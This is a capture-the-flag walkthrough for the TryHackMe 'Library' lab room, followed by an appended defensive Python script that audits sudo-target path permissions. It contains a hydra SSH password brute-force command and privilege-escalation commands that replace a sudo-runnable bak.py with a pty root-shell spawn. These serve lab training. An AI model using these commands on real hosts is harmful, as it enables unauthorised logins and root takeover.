Library is a beginner-level room on TryHackMe. The objective is to get the user flag and the root flag.

| Author | stuxnet |
|---|---|
| Description | boot2root machine for FIT and bsides guatemala CTF. |

Deploy the VM and let’s go.
Enumeration
Let’s start with an nmap scan.
Only the ssh and http services are open. Let’s check the http service.
Use gobuster to brute-force the hidden directories.
gobuster dir -u http://remote-ip-addr/ -w /usr/share/dirb/wordlists/common.txt -t 50 -x php,html,txt,js
I checked the robots.txt file but found nothing useful.
After looking around for a while, I found the username meliodas on the homepage.

User flag
I used hydra to find the password for the user meliodas.
hydra -l meliodas -P ~/Wordlists/rockyou.txt remote-ip-addr ssh
Let’s log in over SSH using the credentials we just found.
Boom!! We got the user flag. Let’s get going to the root flag.
Root flag
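I used sudo -l to get the files that can be run as root.
There is a file named bak.py which can be run as root…but wait, it cannot be edited by the user meliodas.
The file sits in meliodas’s home directory, though, and deleting a file only requires write permission on the directory that contains it, not on the file itself. So, let’s remove it and create a new file with the same name.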
rm bak.py
touch bak.py
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
sudo python /home/meliodas/bak.py
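
A defender's check for the misconfiguration used above, as an added example that is not part of the original write-up: it walks every path component of a sudo-allowed script and reports the ones a non-root user could replace. The sample filesystem table, uid 1000 and the file modes are constructed assumptions; leave `stat_fn` at its default (`os.stat`) to audit a real host.

```python
import os
import stat
from collections import namedtuple

FakeStat = namedtuple("FakeStat", "st_uid st_mode")

# Constructed sample modelled on the room (uids and modes are assumptions):
# bak.py is root-owned and not writable by meliodas, but its directory is his.
SAMPLE_FS = {
    "/": FakeStat(0, stat.S_IFDIR | 0o755),
    "/home": FakeStat(0, stat.S_IFDIR | 0o755),
    "/home/meliodas": FakeStat(1000, stat.S_IFDIR | 0o755),
    "/home/meliodas/bak.py": FakeStat(0, stat.S_IFREG | 0o644),
}


def replaceable_by(path, stat_fn=os.stat, trusted_uid=0):
    """Return (component, reason) for every part of `path` that a non-root
    user could modify or swap out. An empty list means the sudo target is
    pinned by root-only permissions all the way down from /."""
    findings = []
    current = os.path.abspath(path)
    while True:
        st = stat_fn(current)
        if st.st_uid != trusted_uid:
            # The owner of a directory can delete and recreate entries in it,
            # even entries that are themselves read-only and root-owned.
            findings.append((current, "owned by uid %d" % st.st_uid))
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((current, "group/world-writable"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            break
        current = parent
    return findings[::-1]  # report from / downwards


if __name__ == "__main__":
    target = "/home/meliodas/bak.py"
    for component, reason in replaceable_by(target, SAMPLE_FS.__getitem__):
        print("%s -> %s" % (component, reason))
```

An empty result is what a safe sudoers entry looks like: the script and every directory above it are root-owned with no group or world write bit.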

The root flag is in the /root directory.
That’s it folks. Happy hacking!!!